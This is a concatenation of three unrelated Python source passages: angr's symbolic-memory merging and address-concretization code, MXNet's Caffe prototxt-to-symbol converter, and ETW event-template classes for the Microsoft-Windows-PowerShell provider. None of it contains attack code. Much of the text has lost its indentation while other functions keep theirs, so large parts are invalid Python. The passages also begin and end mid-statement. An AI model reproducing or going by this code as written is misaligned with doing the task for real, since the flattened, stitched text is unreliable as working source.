check_permissions=check_permissions
) if mem is None else mem
# set up the strategies
self.read_strategies = read_strategies
self.write_strategies = write_strategies
#
# Lifecycle management
#
@SimMemory.memo
def copy(self, _):
"""
Return a copy of the SimMemory.
"""
#l.debug("Copying %d bytes of memory with id %s." % (len(self.mem), self.id))
c = SimSymbolicMemory(
mem=self.mem.branch(),
memory_id=self.id,
endness=self.endness,
abstract_backer=self._abstract_backer,
read_strategies=[ s.copy() for s in self.read_strategies ],
write_strategies=[ s.copy() for s in self.write_strategies ],
stack_region_map=self._stack_region_map,
generic_region_map=self._generic_region_map
)
return c
#
# Merging stuff
#
def _changes_to_merge(self, others):
changed_bytes = set()
for o in others: # pylint:disable=redefined-outer-name
changed_bytes |= self.changed_bytes(o)
return changed_bytes
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
"""
Merge this SimMemory with the other SimMemory
"""
changed_bytes = self._changes_to_merge(others)
l.info("Merging %d bytes", len(changed_bytes))
l.info("... %s has changed bytes %s", self.id, changed_bytes)
self.read_strategies = self._merge_strategies(self.read_strategies, *[
o.read_strategies for o in others
])
self.write_strategies = self._merge_strategies(self.write_strategies, *[
o.write_strategies for o in others
])
merged_bytes = self._merge(others, changed_bytes, merge_conditions=merge_conditions)
return len(merged_bytes) > 0
@staticmethod
def _merge_strategies(*strategy_lists):
if len(set(len(sl) for sl in strategy_lists)) != 1:
raise SimMergeError("unable to merge memories with amounts of strategies")
merged_strategies = [ ]
for strategies in zip(*strategy_lists):
if len(set(s.__class__ for s in strategies)) != 1:
raise SimMergeError("unable to merge memories with different types of strategies")
unique = list(set(strategies))
if len(unique) > 1:
unique[0].merge(unique[1:])
merged_strategies.append(unique[0])
return merged_strategies
def widen(self, others):
changed_bytes = self._changes_to_merge(others)
l.info("Memory %s widening bytes %s", self.id, changed_bytes)
self._merge(others, changed_bytes, is_widening=True)
return len(changed_bytes) > 0
    def _merge(self, others, changed_bytes, merge_conditions=None, is_widening=False):
        """Merge the given changed bytes from `others` into this memory.

        Walks the changed addresses in order, merging whole memory objects when
        all memories agree on object base/length, and falling back to a
        byte-range merge otherwise. Returns the set of byte addresses that were
        actually merged.
        """
        all_memories = [self] + others
        if merge_conditions is None:
            merge_conditions = [ None ] * len(all_memories)
        # `merged_to` tracks how far the last merged object extends, so bytes
        # already covered by a previous object merge are skipped.
        merged_to = None
        merged_objects = set()
        merged_bytes = set()
        for b in sorted(changed_bytes):
            if merged_to is not None and not b >= merged_to:
                l.info("merged_to = %d ... already merged byte 0x%x", merged_to, b)
                continue
            l.debug("... on byte 0x%x", b)
            memory_objects = []
            unconstrained_in = []
            # first get a list of all memory objects at that location, and
            # all memories that don't have those bytes
            for sm, fv in zip(all_memories, merge_conditions):
                if b in sm.mem:
                    l.info("... present in %s", fv)
                    memory_objects.append((sm.mem[b], fv))
                else:
                    l.info("... not present in %s", fv)
                    unconstrained_in.append((sm, fv))
            mos = set(mo for mo,_ in memory_objects)
            mo_bases = set(mo.base for mo, _ in memory_objects)
            mo_lengths = set(mo.length for mo, _ in memory_objects)
            # Nothing new to merge at this byte: every object was merged before.
            if not unconstrained_in and not (mos - merged_objects):
                continue
            # first, optimize the case where we are dealing with the same-sized memory objects
            if len(mo_bases) == 1 and len(mo_lengths) == 1 and not unconstrained_in:
                our_mo = self.mem[b]
                to_merge = [(mo.object, fv) for mo, fv in memory_objects]
                # Update `merged_to`
                mo_base = list(mo_bases)[0]
                merged_to = mo_base + list(mo_lengths)[0]
                merged_val = self._merge_values(
                    to_merge, memory_objects[0][0].length, is_widening=is_widening
                )
                if options.ABSTRACT_MEMORY in self.state.options:
                    # merge check for abstract memory
                    if not to_merge[0][0].uninitialized and self.state.solver.backends.vsa.identical(merged_val, to_merge[0][0]):
                        continue
                # do the replacement
                new_object = self.mem.replace_memory_object(our_mo, merged_val)
                merged_objects.add(new_object)
                merged_objects.update(mos)
                merged_bytes.add(b)
            else:
                # get the size that we can merge easily. This is the minimum of
                # the size of all memory objects and unallocated spaces.
                min_size = min([mo.length - (b - mo.base) for mo, _ in memory_objects])
                for um, _ in unconstrained_in:
                    for i in range(0, min_size):
                        if b + i in um:
                            min_size = i
                            break
                merged_to = b + min_size
                l.info("... determined minimum size of %d", min_size)
                # Now, we have the minimum size. We'll extract/create expressions of that
                # size and merge them
                extracted = [(mo.bytes_at(b, min_size), fv) for mo, fv in memory_objects] if min_size != 0 else []
                created = [
                    (self.get_unconstrained_bytes("merge_uc_%s_%x" % (uc.id, b), min_size * self.state.arch.byte_width), fv) for
                    uc, fv in unconstrained_in
                ]
                to_merge = extracted + created
                merged_val = self._merge_values(to_merge, min_size, is_widening=is_widening)
                if options.ABSTRACT_MEMORY in self.state.options:
                    # merge check for abstract memory
                    if (not unconstrained_in or not unconstrained_in[0][0] is self) \
                            and self.state.solver.backends.vsa.identical(merged_val, to_merge[0][0]):
                        continue
                self.store(b, merged_val, endness='Iend_BE', inspect=False)  # do not convert endianness again
                merged_bytes.add(b)
        return merged_bytes
def set_state(self, state):
super(SimSymbolicMemory, self).set_state(state)
self.mem.state = state._get_weakref()
if self.state is not None:
if self.read_strategies is None:
self._create_default_read_strategies()
if self.write_strategies is None:
self._create_default_write_strategies()
def _create_default_read_strategies(self):
self.read_strategies = [ ]
if options.APPROXIMATE_MEMORY_INDICES in self.state.options:
# first, we try to resolve the read address by approximation
self.read_strategies.append(
concretization_strategies.SimConcretizationStrategyRange(1024, exact=False),
)
# then, we try symbolic reads, with a maximum width of a kilobyte
self.read_strategies.append(
concretization_strategies.SimConcretizationStrategyRange(1024)
)
if options.CONSERVATIVE_READ_STRATEGY not in self.state.options:
# finally, we concretize to any one solution
self.read_strategies.append(
concretization_strategies.SimConcretizationStrategyAny(),
)
def _create_default_write_strategies(self):
self.write_strategies = [ ]
if options.APPROXIMATE_MEMORY_INDICES in self.state.options:
if options.SYMBOLIC_WRITE_ADDRESSES not in self.state.options:
# we try to resolve a unique solution by approximation
self.write_strategies.append(
concretization_strategies.SimConcretizationStrategySingle(exact=False),
)
else:
# we try a solution range by approximation
self.write_strategies.append(
concretization_strategies.SimConcretizationStrategyRange(128, exact=False)
)
if options.SYMBOLIC_WRITE_ADDRESSES in self.state.options:
# we try to find a range of values
self.write_strategies.append(
concretization_strategies.SimConcretizationStrategyRange(128)
)
else:
# we try to find a range of values, but only for ASTs annotated with the multiwrite annotation
self.write_strategies.append(concretization_strategies.SimConcretizationStrategyRange(
128,
filter=_multiwrite_filter
))
# finally, we just grab the maximum solution
if options.CONSERVATIVE_WRITE_STRATEGY not in self.state.options:
self.write_strategies.append(
concretization_strategies.SimConcretizationStrategyMax()
)
#
# Symbolicizing!
#
def make_symbolic(self, name, addr, length=None):
"""
Replaces `length` bytes starting at `addr` with a symbolic variable named name. Adds a constraint equaling that
symbolic variable to the value previously at `addr`, and returns the variable.
"""
l.debug("making %s bytes symbolic", length)
if isinstance(addr, str):
addr, length = self.state.arch.registers[addr]
else:
if length is None:
raise Exception("Unspecified length!")
r = self.load(addr, length)
v = self.get_unconstrained_bytes(name, r.size())
self.store(addr, v)
self.state.add_constraints(r == v)
l.debug("... eq constraints: %s", r == v)
return v
#
# Address concretization
#
def _resolve_size_range(self, size):
if not self.state.solver.symbolic(size):
i = self.state.solver.eval(size)
if i > self._maximum_concrete_size:
raise SimMemoryLimitError("Concrete size %d outside of allowable limits" % i)
return i, i
if options.APPROXIMATE_MEMORY_SIZES in self.state.options:
max_size_approx = self.state.solver.max_int(size, exact=True)
min_size_approx = self.state.solver.min_int(size, exact=True)
if max_size_approx < self._maximum_symbolic_size_approx:
return min_size_approx, max_size_approx
max_size = self.state.solver.max_int(size)
min_size = self.state.solver.min_int(size)
if min_size > self._maximum_symbolic_size:
self.state.history.add_event('memory_limit', message="Symbolic size %d outside of allowable limits" % min_size, size=size)
if options.BEST_EFFORT_MEMORY_STORING not in self.state.options:
raise SimMemoryLimitError("Symbolic size %d outside of allowable limits" % min_size)
else:
min_size = self._maximum_symbolic_size
return min_size, min(max_size, self._maximum_symbolic_size)
#
# Concretization strategies
#
    def _apply_concretization_strategies(self, addr, strategies, action):
        """
        Applies concretization strategies on the address until one of them succeeds.

        :param addr:       The address AST to concretize.
        :param strategies: The list of strategies to try, in order.
        :param action:     'load' or 'store' style action label, used for inspect
                           breakpoints and error messages.
        :raises SimMemoryAddressError: if no strategy produces a result.
        """
        # we try all the strategies in order
        for s in strategies:
            # first, we trigger the SimInspect breakpoint and give it a chance to intervene
            e = addr
            self.state._inspect(
                'address_concretization', BP_BEFORE, address_concretization_strategy=s,
                address_concretization_action=action, address_concretization_memory=self,
                address_concretization_expr=e, address_concretization_add_constraints=True
            )
            # The breakpoint may have swapped out the strategy and/or expression.
            s = self.state._inspect_getattr('address_concretization_strategy', s)
            e = self.state._inspect_getattr('address_concretization_expr', addr)
            # if the breakpoint None'd out the strategy, we skip it
            if s is None:
                continue
            # let's try to apply it!
            try:
                a = s.concretize(self, e)
            except SimUnsatError:
                # An unsatisfiable strategy just means "try the next one".
                a = None
            # trigger the AFTER breakpoint and give it a chance to intervene
            self.state._inspect(
                'address_concretization', BP_AFTER,
                address_concretization_result=a
            )
            a = self.state._inspect_getattr('address_concretization_result', a)
            # return the result if not None!
            if a is not None:
                return a
        # well, we tried
        raise SimMemoryAddressError(
            "Unable to concretize address for %s with the provided strategies." % action
        )
def concretize_write_addr(self, addr, strategies=None):
"""
Concretizes an address meant for writing.
:param addr: An expression for the address.
:param strategies: A list of concretization strategies (to | |
# example/ssd/tools/caffe_converter/convert_symbol.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
from google.protobuf import text_format
import argparse
import re
import sys
import math
caffe_flag = True
try:
import caffe
from caffe.proto import caffe_pb2
except ImportError:
caffe_flag = False
import caffe_parse.caffe_pb2
def read_proto_solver_file(file_path):
    """Parse a caffe prototxt network file into a NetParameter message."""
    if caffe_flag:
        net_param = caffe.proto.caffe_pb2.NetParameter()
    else:
        net_param = caffe_parse.caffe_pb2.NetParameter()
    return read_proto_file(file_path, net_param)
def read_proto_file(file_path, parser_object):
    """Read a protobuf text-format file into `parser_object` and return it.

    :param file_path:     path of the text-format (.prototxt) file
    :param parser_object: a protobuf message instance to merge into
    :raises OSError: if the file cannot be opened
    """
    # Use a context manager so the handle is closed even if parsing raises;
    # the previous version leaked the handle on parse errors. Its
    # `if not file` check was also dead code: open() never returns a falsy
    # value — it raises on failure.
    with open(file_path, "r") as proto_file:
        text_format.Merge(proto_file.read(), parser_object)
    return parser_object
def conv_param_to_string(param):
    """Render a caffe convolution parameter as an mx.symbol argument string.

    Handles caffe proto fields that may be either scalars or repeated
    containers (pad, stride, kernel_size, dilation).
    """
    def _first_or(value, default):
        # Repeated proto fields come in as containers; take the first entry,
        # falling back to `default` when the field is empty.
        if isinstance(value, int):
            return value
        return default if len(value) == 0 else value[0]

    pad = _first_or(param.pad, 0)
    stride = _first_or(param.stride, 1)
    dilate = _first_or(param.dilation, 1)
    # kernel_size is mandatory for conv layers, so no fallback is needed.
    kernel = param.kernel_size if isinstance(param.kernel_size, int) else param.kernel_size[0]
    # convert to string except for dilation
    param_string = "num_filter=%d, pad=(%d,%d), kernel=(%d,%d), stride=(%d,%d), no_bias=%s" % \
                   (param.num_output, pad, pad, kernel, kernel, stride, stride, not param.bias_term)
    # deal with dilation. Won't be in deconvolution
    if dilate > 1:
        param_string += ", dilate=(%d, %d)" % (dilate, dilate)
    return param_string
def find_layer(layers, name):
    """Return the first layer whose .name equals `name`, or None if absent."""
    return next((layer for layer in layers if layer.name == name), None)
def proto2script(proto_file):
proto = read_proto_solver_file(proto_file)
connection = dict()
symbols = dict()
top = dict()
flatten_count = 0
symbol_string = ""
layer = ''
if len(proto.layer):
layer = proto.layer
elif len(proto.layers):
layer = proto.layers
else:
raise Exception('Invalid proto file.')
# Get input size to network
input_dim = [1, 3, 224, 224] # default
if len(proto.input_dim) > 0:
input_dim = proto.input_dim
elif len(proto.input_shape) > 0:
input_dim = proto.input_shape[0].dim
elif layer[0].type == "Input":
input_dim = layer[0].input_param.shape._values[0].dim
layer.pop(0)
else:
raise Exception('Invalid proto file.')
# We assume the first bottom blob of first layer is the output from data layer
input_name = layer[0].bottom[0]
output_name = ""
mapping = {input_name: 'data'}
need_flatten = {input_name: False}
for i in range(len(layer)):
type_string = ''
param_string = ''
name = re.sub('[-/]', '_', layer[i].name)
from_name = 'data='
bottom_order = []
if layer[i].type == 'Convolution' or layer[i].type == 4:
type_string = 'mx.symbol.Convolution'
param_string = conv_param_to_string(layer[i].convolution_param)
need_flatten[name] = True
if layer[i].type == 'Deconvolution' or layer[i].type == 39:
type_string = 'mx.symbol.Deconvolution'
param_string = conv_param_to_string(layer[i].convolution_param)
need_flatten[name] = True
if layer[i].type == 'Pooling' or layer[i].type == 17:
type_string = 'mx.symbol.Pooling'
param = layer[i].pooling_param
param_string = ''
param_string += "pooling_convention='full', "
if param.global_pooling:
# there must be a param `kernel` in a pooling layer
param_string += "global_pool=True, kernel=(1,1)"
else:
param_string += "pad=(%d,%d), kernel=(%d,%d), stride=(%d,%d)" % \
(param.pad, param.pad, param.kernel_size, param.kernel_size, param.stride, param.stride)
if param.pool == 0:
param_string += ", pool_type='max'"
elif param.pool == 1:
param_string += ", pool_type='avg'"
else:
raise Exception("Unknown Pooling Method!")
need_flatten[name] = True
if layer[i].type == 'ReLU' or layer[i].type == 18:
type_string = 'mx.symbol.Activation'
param_string = "act_type='relu'"
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'TanH' or layer[i].type == 23:
type_string = 'mx.symbol.Activation'
param_string = "act_type='tanh'"
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'Sigmoid' or layer[i].type == 19:
type_string = 'mx.symbol.Activation'
param_string = "act_type='sigmoid'"
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'LRN' or layer[i].type == 15:
type_string = 'mx.symbol.LRN'
param = layer[i].lrn_param
param_string = "alpha=%f, beta=%f, knorm=%f, nsize=%d" % \
(param.alpha, param.beta, param.k, param.local_size)
need_flatten[name] = True
if layer[i].type == 'InnerProduct' or layer[i].type == 14:
type_string = 'mx.symbol.FullyConnected'
param = layer[i].inner_product_param
param_string = "num_hidden=%d, no_bias=%s" % (param.num_output, not param.bias_term)
need_flatten[name] = False
if layer[i].type == 'Dropout' or layer[i].type == 6:
type_string = 'mx.symbol.Dropout'
param = layer[i].dropout_param
param_string = "p=%f" % param.dropout_ratio
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'Softmax' or layer[i].type == 20:
if layer[i].softmax_param.axis == 2:
symbol_string += "%s = mx.symbol.transpose(%s, axes=(0,2,1))\n" %\
(mapping[layer[i].bottom[0]], mapping[layer[i].bottom[0]])
type_string = 'mx.symbol.SoftmaxActivation'
param_string = "mode='channel'"
need_flatten[name] = False
else:
type_string = 'mx.symbol.SoftmaxOutput'
if layer[i].type == 'Flatten' or layer[i].type == 8:
if 'softmax' in layer[i].bottom[0]:
type_string = 'identical'
else:
type_string = 'mx.symbol.Flatten'
need_flatten[name] = False
if layer[i].type == 'Split' or layer[i].type == 22:
type_string = 'split'
if layer[i].type == 'Concat' or layer[i].type == 3:
type_string = 'mx.symbol.Concat'
need_flatten[name] = True
if layer[i].type == 'Crop':
type_string = 'mx.symbol.Crop'
need_flatten[name] = True
param_string = 'center_crop=True'
if layer[i].type == 'BatchNorm':
type_string = 'mx.symbol.BatchNorm'
param = layer[i].batch_norm_param
param_string = 'use_global_stats=%s' % param.use_global_stats
if layer[i].type == 'PReLU':
type_string = 'mx.symbol.LeakyReLU'
param = layer[i].prelu_param
param_string = "act_type='prelu', slope=%f" % param.filler.value
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'Normalize':
bottom = re.sub('[-/]', '_', layer[i].bottom[0])
conv_layer = find_layer(layer, bottom)
assert conv_layer is not None
param = layer[i].norm_param
assert not param.across_spatial and not param.channel_shared
assert param.scale_filler.type == 'constant'
if conv_layer.type == 'Convolution':
scale_name = "%s_scale" % name
symbol_string += "%s=mx.sym.Variable(name='%s', shape=(1, %d, 1, 1), init=mx.init.Constant(%f))\n" % \
(scale_name, scale_name, conv_layer.convolution_param.num_output,
param.scale_filler.value)
symbol_string += "%s=mx.symbol.L2Normalization(name='%s', data=%s, mode='channel')\n" %\
(name, name, mapping[layer[i].bottom[0]])
symbol_string += "%s=mx.symbol.broadcast_mul(lhs=%s, rhs=%s)\n" %\
(name, scale_name, name)
type_string = 'split'
need_flatten[name] = True
else:
raise ValueError('Unknown/Invalid normalize layer!')
if layer[i].type == 'Permute':
type_string = 'mx.symbol.transpose'
param_string = "axes=(%s)" % (','.join([str(x) for x in layer[i].permute_param.order]))
need_flatten[name] = True
from_name = ''
if layer[i].type == 'PriorBox':
param = layer[i].prior_box_param
if layer[i].bottom[0] == 'data':
bottom_order = [1]
else:
bottom_order = [0]
try:
min_size = param.min_size[0] / input_dim[2]
max_size = math.sqrt(param.min_size[0] * param.max_size[0]) / input_dim[2]
sizes = '(%f, %f)' %(min_size, max_size)
except AttributeError:
min_size = param.min_size[0] / input_dim[2]
sizes = '(%f)' %(min_size)
ars = list(param.aspect_ratio)
ratios = [1.]
for ar in ars:
ratios.append(ar)
if param.flip:
ratios.append(1. / ar)
ratios_string = '(' + ','.join(str(x) for x in ratios) + ')'
clip = param.clip
if (param.step_h > 0 or param.step_w > 0):
step_h = param.step_h
step_w = param.step_w
elif param.step > 0:
step_h = param.step
step_w = param.step
else:
step_h = -1
step_w = -1
finput_dim = float(input_dim[2])
step = '(%f, %f)' % (step_h / finput_dim, step_w / finput_dim)
assert param.offset == 0.5, "currently only support offset = 0.5"
symbol_string += '%s = mx.contrib.symbol.MultiBoxPrior(%s, sizes=%s, ratios=%s, clip=%s, steps=%s, name="%s")\n' % \
(name, mapping[layer[i].bottom[0]], sizes, ratios_string, clip, step, name)
symbol_string += '%s = mx.symbol.Flatten(data=%s)\n' % (name, name)
type_string = 'split'
need_flatten[name] = False
if layer[i].type == 'Reshape':
type_string = 'mx.symbol.Reshape'
param = layer[i].reshape_param
param_string = 'shape=(' + ','.join([str(x) for x in list(param.shape.dim)]) + ')'
need_flatten[name] = True
if layer[i].type == 'DetectionOutput':
bottom_order = [1, 0, 2]
param = layer[i].detection_output_param
assert param.share_location == True
assert param.background_label_id == 0
nms_param = param.nms_param
type_string = 'mx.contrib.symbol.MultiBoxDetection'
param_string = "nms_threshold=%f, nms_topk=%d" % \
(nms_param.nms_threshold, nms_param.top_k)
if type_string == '':
raise Exception('Unknown Layer %s!' % layer[i].type)
if type_string == 'identical':
bottom = layer[i].bottom
symbol_string += "%s = %s\n" % (name, mapping[bottom[0]])
elif type_string != 'split':
bottom = layer[i].bottom
if param_string != "":
param_string = ", " + param_string
if len(bottom) == 1:
if need_flatten[mapping[bottom[0]]] and type_string == 'mx.symbol.FullyConnected':
flatten_name = "flatten_%d" % flatten_count
symbol_string += "%s=mx.symbol.Flatten(name='%s', data=%s)\n" % \
(flatten_name, flatten_name, mapping[bottom[0]])
flatten_count += 1
need_flatten[flatten_name] = False
bottom[0] = flatten_name
mapping[bottom[0]] = bottom[0]
symbol_string += "%s = %s(%s%s %s, name='%s')\n" % \
(name, type_string, from_name, mapping[bottom[0]], param_string, name)
else:
if not bottom_order:
bottom_order = range(len(bottom))
symbol_string += "%s = %s(name='%s', *[%s] %s)\n" % \
(name, type_string, name, ','.join([mapping[bottom[x]] for x in bottom_order]), param_string)
if layer[i].type == 'Concat' and layer[i].concat_param.axis == 2:
symbol_string += "%s = mx.symbol.Reshape(data=%s, shape=(0, -1, 4), name='%s')\n" %\
(name, name, name)
for j in range(len(layer[i].top)):
mapping[layer[i].top[j]] = name
output_name = name
return symbol_string, output_name, | |
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-PowerShell
GUID : a0c1853b-5c40-4b15-8766-3cf1c58f985a
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4100, version=1)
class Microsoft_Windows_PowerShell_4100_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 4100 (version 1): ContextInfo/UserData/Payload strings."""
    pattern = Struct(
        "ContextInfo" / WString,
        "UserData" / WString,
        "Payload" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4101, version=1)
class Microsoft_Windows_PowerShell_4101_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 4101 (version 1): ContextInfo/UserData/Payload strings."""
    pattern = Struct(
        "ContextInfo" / WString,
        "UserData" / WString,
        "Payload" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4102, version=1)
class Microsoft_Windows_PowerShell_4102_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 4102 (version 1): ContextInfo/UserData/Payload strings."""
    pattern = Struct(
        "ContextInfo" / WString,
        "UserData" / WString,
        "Payload" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4103, version=1)
class Microsoft_Windows_PowerShell_4103_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 4103 (version 1): ContextInfo/UserData/Payload strings."""
    pattern = Struct(
        "ContextInfo" / WString,
        "UserData" / WString,
        "Payload" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4104, version=1)
class Microsoft_Windows_PowerShell_4104_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 4104 (version 1).

    Carries a (possibly multi-part) script block: message sequence counters,
    the script block text, its id, and a path field.
    """
    pattern = Struct(
        "MessageNumber" / Int32sl,
        "MessageTotal" / Int32sl,
        "ScriptBlockText" / WString,
        "ScriptBlockId" / WString,
        "Path" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4105, version=1)
class Microsoft_Windows_PowerShell_4105_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 4105 (version 1): script block id and runspace id."""
    pattern = Struct(
        "ScriptBlockId" / WString,
        "RunspaceId" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4106, version=1)
class Microsoft_Windows_PowerShell_4106_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 4106 (version 1): script block id and runspace id."""
    pattern = Struct(
        "ScriptBlockId" / WString,
        "RunspaceId" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7937, version=1)
class Microsoft_Windows_PowerShell_7937_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 7937 (version 1): ContextInfo/UserData/Payload strings."""
    pattern = Struct(
        "ContextInfo" / WString,
        "UserData" / WString,
        "Payload" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7938, version=1)
class Microsoft_Windows_PowerShell_7938_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 7938 (version 1): ContextInfo/UserData/Payload strings."""
    pattern = Struct(
        "ContextInfo" / WString,
        "UserData" / WString,
        "Payload" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7939, version=1)
class Microsoft_Windows_PowerShell_7939_1(Etw):
    """Microsoft-Windows-PowerShell ETW event 7939 (version 1): ContextInfo/UserData/Payload strings."""
    pattern = Struct(
        "ContextInfo" / WString,
        "UserData" / WString,
        "Payload" / WString
    )
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7940, version=1)
class Microsoft_Windows_PowerShell_7940_1(Etw):
pattern = Struct(
"ContextInfo" / WString,
"UserData" / WString,
"Payload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7941, version=1)
class Microsoft_Windows_PowerShell_7941_1(Etw):
pattern = Struct(
"currentActivityId" / Guid,
"parentActivityId" / Guid
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7942, version=1)
class Microsoft_Windows_PowerShell_7942_1(Etw):
pattern = Struct(
"ClassName" / WString,
"MethodName" / WString,
"WorkflowGuid" / WString,
"Message" / WString,
"JobData" / WString,
"ActivityName" / WString,
"ActivityGuid" / WString,
"Parameters" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=8193, version=1)
class Microsoft_Windows_PowerShell_8193_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=8194, version=1)
class Microsoft_Windows_PowerShell_8194_1(Etw):
pattern = Struct(
"InstanceId" / WString,
"MaxRunspaces" / WString,
"MinRunspaces" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=8197, version=1)
class Microsoft_Windows_PowerShell_8197_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=8198, version=1)
class Microsoft_Windows_PowerShell_8198_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12033, version=1)
class Microsoft_Windows_PowerShell_12033_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12034, version=1)
class Microsoft_Windows_PowerShell_12034_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12035, version=1)
class Microsoft_Windows_PowerShell_12035_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12036, version=1)
class Microsoft_Windows_PowerShell_12036_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12038, version=1)
class Microsoft_Windows_PowerShell_12038_1(Etw):
pattern = Struct(
"uri" / WString,
"shell" / WString,
"userName" / WString,
"opentimeout" / WString,
"idletimeout" / WString,
"canceltimeout" / WString,
"auth" / Int32ul,
"thumbPrint" / WString,
"redircount" / WString,
"recvdDataSize" / WString,
"recvdObjSize" / WString
)
# Auto-generated ETW event templates for the Microsoft-Windows-PowerShell
# provider: script file / debugger events (24577-24599) and
# serialization/deserialization diagnostics (28673-28684).
# Each `pattern` describes the binary user-data layout of one
# (event_id, version) pair; do not edit by hand.
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24577, version=1)
class Microsoft_Windows_PowerShell_24577_1(Etw):
    pattern = Struct(
        "FileName" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24578, version=1)
class Microsoft_Windows_PowerShell_24578_1(Etw):
    pattern = Struct(
        "FileName" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24595, version=1)
class Microsoft_Windows_PowerShell_24595_1(Etw):
    pattern = Struct(
        "CurrentLine" / Int32sl,
        "FileName" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24596, version=1)
class Microsoft_Windows_PowerShell_24596_1(Etw):
    pattern = Struct(
        "CurrentLine" / Int32sl,
        "FileName" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24597, version=1)
class Microsoft_Windows_PowerShell_24597_1(Etw):
    pattern = Struct(
        "CurrentLine" / Int32sl,
        "FileName" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24598, version=1)
class Microsoft_Windows_PowerShell_24598_1(Etw):
    pattern = Struct(
        "CurrentLine" / Int32sl,
        "FileName" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24599, version=1)
class Microsoft_Windows_PowerShell_24599_1(Etw):
    pattern = Struct(
        "CurrentLine" / Int32sl,
        "FileName" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28673, version=1)
class Microsoft_Windows_PowerShell_28673_1(Etw):
    pattern = Struct(
        "DeserializedType" / WString,
        "CastedToType" / WString,
        "RehydratedType" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28674, version=1)
class Microsoft_Windows_PowerShell_28674_1(Etw):
    pattern = Struct(
        "DeserializedType" / WString,
        "CastedToType" / WString,
        "TypeCastException" / WString,
        "TypeCastInnerException" / WString
    )

@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28675, version=1)
